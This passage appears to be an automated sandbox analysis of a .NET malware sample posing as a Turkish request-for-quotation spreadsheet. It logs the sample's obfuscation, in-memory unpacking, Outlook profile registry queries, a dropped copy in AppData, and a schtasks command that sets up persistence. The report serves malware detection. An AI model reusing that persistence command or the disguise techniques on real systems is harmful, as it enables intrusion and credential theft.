                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: anmZ.pdb source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, gNFUFfdz.exe.0.dr
                Source: Binary string: anmZ.pdbSHA256 source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, gNFUFfdz.exe.0.dr

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, Ot9VvNV66DIV9guJ5R.cs.Net Code: CTbuAb6y3w System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_0621A440 push es; ret 0_2_0621A460
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062EE188 push eax; mov dword ptr [esp], edx0_2_062EE19C
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062EE9BF push es; ret 0_2_062EE9D0
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_07FC7DA0 push 9C07FA59h; ret 0_2_07FC7DC5
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_07FCAC82 pushad ; iretd 0_2_07FCACE1
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_07FC78E8 pushfd ; ret 0_2_07FC78F1
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_07FC789C push 9C07FA59h; ret 0_2_07FC7DC5
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_057EE198 push eax; mov dword ptr [esp], edx9_2_057EE19C
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD86CD push es; retf 0006h9_2_06CD86CF
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD76D9 pushad ; retf 9_2_06CD76DA
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD8693 push es; retf 0006h9_2_06CD8695
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD77CD push es; retf 0006h9_2_06CD77CF
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD57C3 push eax; retf 9_2_06CD57CA
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD77AB pushad ; retf 9_2_06CD77B2
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD57BF push ecx; retf 9_2_06CD57C2
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD07B8 push ds; retf 9_2_06CD07BA
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD7761 pushad ; retf 9_2_06CD7762
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD7763 pushad ; retf 9_2_06CD776A
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD7719 pushad ; retf 9_2_06CD771A
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD8491 push es; retf 0006h9_2_06CD8493
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD6409 push ebp; retf 9_2_06CD640A
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD6400 push ebp; retf 9_2_06CD6402
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD5560 push eax; retf 9_2_06CD5562
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD0529 push es; retf 0006h9_2_06CD052B
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD6239 push esp; retf 9_2_06CD623A
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD03ED push es; retf 0006h9_2_06CD03EF
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD6329 push esp; retf 9_2_06CD632A
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD30CB push es; retf 0006h9_2_06CD30CD
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD20F8 pushad ; retf 9_2_06CD20F9
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD60A1 push esp; retf 9_2_06CD60A2
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 9_2_06CD6179 push esp; retf 9_2_06CD617A
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeStatic PE information: section name: .text entropy: 7.87973773384543
                Source: gNFUFfdz.exe.0.drStatic PE information: section name: .text entropy: 7.87973773384543
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, nsBeuQxt9N13uT6wDj.csHigh entropy of concatenated method names: 'f4b2lKXxpS', 'zOX2DJCixx', 'yiN2ZU2MMj', 'rPT2mXWpEH', 's502SsV79C', 'A0w2Vgc3lK', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, FtVW914fkyVkiGmFFO.csHigh entropy of concatenated method names: 'lJ4AyeeTp', 'COshoeUaV', 'GnxOSvftU', 'CW4fUkTuX', 'GerdIv314', 'di0yGnSIq', 'TwvenUQ6AuJ8JZooUT', 'xWXrL4XasV1ZSQYWJy', 'PZGe4PLeB', 'AZD2GZ6WT'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, PN1NUuJNbfvxGYAmpS.csHigh entropy of concatenated method names: 'KpUSCD7jQu', 'K1GSoNMpjV', 'FxXSSc9uQS', 'RH8S5DqiDA', 'hu8SUdt0Mk', 'zH9SkbnK0h', 'Dispose', 'MV6e3CUZEK', 'egpeLUsAlQ', 'BRGelvP3Nb'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, RsM9H3K4KMK97oxgfjc.csHigh entropy of concatenated method names: 'ToString', 'HLY5c7lToB', 'rQK5dbsxeX', 'g7f5ynwXd1', 'jcQ50BbLr6', 'Dt75MlxsU9', 'ekh5t9wymf', 'BIb56cBOZc', 'RovyMfE4o1I3coOQPxi', 'nt6aWZE5gINlrRZQTcG'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, vxdrEXKK38EtqMphRRK.csHigh entropy of concatenated method names: 'Xu32xAEesR', 'VXS2zQjHOQ', 'qFk5N0JvaB', 'VOS5Kn5p0g', 'jUr54S0eHy', 'tqm5wglu7s', 'mtG5uo2IKc', 'cKU58O5Kfn', 'OmC53uyZOi', 'e3P5LH4qsu'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, eGeYeGHwUqCa4AZI7V.csHigh entropy of concatenated method names: 'M6SS0ah6hZ', 'QGYSMGydx5', 'nIAStRn8BO', 'Ia9S6fqYMN', 'zyCSiOqGjp', 'ze5SRy6TWW', 'zKHSv2juSa', 'iy7SXyOjs0', 'z8mSQGHRXJ', 'FSPS7Vfhp9'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, JJmMVS0s5KfBeOOMh2.csHigh entropy of concatenated method names: 'hpYZ8s9XNY', 'lcLZLWBwxw', 'xSPZD6lduS', 'IAgZmTEkp9', 'RIUZVdYnoN', 'aXWDpitvFY', 'i3ODFE5jtP', 'kCLDJdc2Bj', 'DihDEtuajv', 'viCDHL1fgI'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, YyqeYEKNEvwqAepD5UW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kAT2qHoM9l', 'BiO2Y2u3hU', 'Ify2brRXoA', 'WvA21gLSCo', 'k1O2G5hu95', 'MBv2aiC2No', 'end2BIapSU'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, fN0Vc1L0Pmuxa0IvoP.csHigh entropy of concatenated method names: 'Dispose', 'CvxKHGYAmp', 'QZU4M6X74S', 'G5O3F7WZ1d', 's6hKxRCuvL', 'GtTKzlbodW', 'ProcessDialogKey', 'kF84NGeYeG', 'dUq4KCa4AZ', 'p7V44jsBeu'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, vCbgITKuSLcPfBcP8uD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a3BnSFCO1l', 'nrdn2LMYST', 'JsEn5gePyE', 'NhLnnO1nyI', 'nutnU592Pw', 'E4wnrmrpdd', 'E2qnkW3nV0'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, EO70QEBwNBrcTnmC70.csHigh entropy of concatenated method names: 'nuyos4SrRF', 'T28oWvm6fm', 'ToString', 'vCWo3BdUps', 'cYcoLnORbe', 'mQ9olvxcqI', 'ttPoDi5AeZ', 'BMyoZQY1ss', 'usSomKO9OL', 'h6xoVxswlH'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, jXADsn6q2YnslRg1KZ.csHigh entropy of concatenated method names: 'Xu9ZkPdMqC', 'uLCZ9QcKJ6', 'SXdZAu0TrH', 'N2kZhl11iu', 'qtfZORXXj3', 'weHZfHFkr3', 'AycZdFFYQ0', 'JX4ZyQA2Wv', 'stRJlYbnVKB60DMwKS3', 'X5LBvUbobvmiDOpEGYb'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, KJNxtibELCWeD2gclF.csHigh entropy of concatenated method names: 'uRRjchHSwO', 'pL3jdoZdSQ', 'Cc4j0txLB8', 'i1ejMDxXK7', 'GeGj6CSgCn', 'IuNjig9CdL', 'ePXjvtnk4n', 'my5jXW8meo', 'v1Dj7OiIco', 'k1HjqASw9W'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, B3haO0cput5fqoIn0h.csHigh entropy of concatenated method names: 'bu1L1358gP', 'w0ILGfXpWV', 'WUSLacoxpR', 'NxNLBV2Q0S', 'accLpw01lr', 'g7hLFMCLoY', 'kZELJk1qxp', 'pDCLEfo179', 'eP6LH8B0rq', 'tT4LxSle6m'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, IZxGtGQOHEAoFSjiuk.csHigh entropy of concatenated method names: 'JZCm9siIHO', 'm6nmTDVFdf', 'LAQmA480K9', 'Qn2mhgGVso', 'wrmmgWQ0ft', 'Aj6mOOrtwi', 'Iwbmf9GmDf', 'eDmmcBGJMu', 'kQjmdWakce', 'sSwmyn9cjL'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, iGP81C1Z1GaYWf11cQ.csHigh entropy of concatenated method names: 'riUC76yqxP', 'lmcCY2Kkos', 'VejC1NAXxG', 'iKlCGptgRG', 'uGhCMulaTr', 'KpdCtJ6bwI', 'OVNC6xfgh3', 'MrcCiR1arZ', 'g8OCRxZsmb', 'TTwCvtEqXh'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, nkaHdZzSx1I2TFKKIH.csHigh entropy of concatenated method names: 'w5f2OeQ5rO', 'ASb2caMyee', 'L6d2dKbqST', 'UYg20tNybn', 'aOO2MvF6AW', 'KtO26vZAjs', 'RTj2iBNPTh', 'AIX2kEKDqu', 'qX429DUsy3', 'HIw2T3vqDm'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, Ot9VvNV66DIV9guJ5R.csHigh entropy of concatenated method names: 'PmEw8GsaPg', 'mNow3UNIme', 'p3nwLs5XeF', 'aciwlDXyid', 'eLowDYES01', 'jnVwZvW5jn', 'zaBwmncWKP', 'iQhwVv643X', 'cbjwP4OOVS', 'VXBwsIL8y9'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, v3k7kcd76Tybsj0g3O.csHigh entropy of concatenated method names: 'WBRlhoAF4Q', 'D13lO88ZYh', 'ODElctWFNQ', 'hnGldovNLY', 'KXxlCvPhYa', 'AEIlIEB9UQ', 'Wp4lo6cgOy', 'DiylemPY9o', 'E3ylSRD2LL', 'Jckl2jAxbh'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, KcJTBoyxKRNp8VA5BM.csHigh entropy of concatenated method names: 'FeqDgTHSEc', 'wAUDflxfZl', 'CooltbpEFq', 'rBQl6f8hal', 'p4IlieLbQ0', 'HOklRNbHK8', 'mEFlvC0jcG', 'UgqlXMlbA7', 'pgRlQuALNc', 'qy6l7NYvQw'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, O6I5oGFYP9Zlwgh0jL.csHigh entropy of concatenated method names: 'XgaoEviSLO', 'wqloxau6Fj', 'F8FeNkX8Y5', 'MkneKOyLSO', 'T4joqIw8JC', 'vBFoY4Xrmi', 'SIQobb2osv', 'MK2o1hn5A5', 'NkqoGot00k', 'zqAoaeeGyY'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, s5mmHovD4DX8ui7Z25.csHigh entropy of concatenated method names: 'FMum3Vf5fl', 'x2rmlBwM6n', 'rNHmZ0f7xB', 'eBQZxWtiRu', 'lQOZzs7qrP', 'dihmNEg0pY', 'LvWmKcOvMU', 'UQam43uFVe', 'slHmw1NgcW', 'lxBmu1vMjc'
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.9660000.6.raw.unpack, qXMFkPu8EhubYtaeWG.csHigh entropy of concatenated method names: 'f2OKm3haO0', 'UutKV5fqoI', 'D76KsTybsj', 'Gg3KWORcJT', 'kA5KCBMiJm', 'GVSKIs5KfB', 'qZI6piWCbYLoVOnfHO', 'lFVcfIHE9655hyGQlj', 'IIZKKOm91c', 'pcFKwiE03P'
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: \2025 5595 tekl#u0130f #u0130ste#u011e#u0130 - t#u00dcb#u0130tak sage rfq_xlsx.exe
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: \2025 5595 tekl#u0130f #u0130ste#u011e#u0130 - t#u00dcb#u0130tak sage rfq_xlsx.exe
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: \2025 5595 tekl#u0130f #u0130ste#u011e#u0130 - t#u00dcb#u0130tak sage rfq_xlsx.exe
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: \2025 5595 tekl#u0130f #u0130ste#u011e#u0130 - t#u00dcb#u0130tak sage rfq_xlsx.exe
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: \2025 5595 tekl#u0130f #u0130ste#u011e#u0130 - t#u00dcb#u0130tak sage rfq_xlsx.exeJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: \2025 5595 tekl#u0130f #u0130ste#u011e#u0130 - t#u00dcb#u0130tak sage rfq_xlsx.exeJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: \2025 5595 tekl#u0130f #u0130ste#u011e#u0130 - t#u00dcb#u0130tak sage rfq_xlsx.exeJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: \2025 5595 tekl#u0130f #u0130ste#u011e#u0130 - t#u00dcb#u0130tak sage rfq_xlsx.exeJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeFile created: C:\Users\user\AppData\Roaming\gNFUFfdz.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
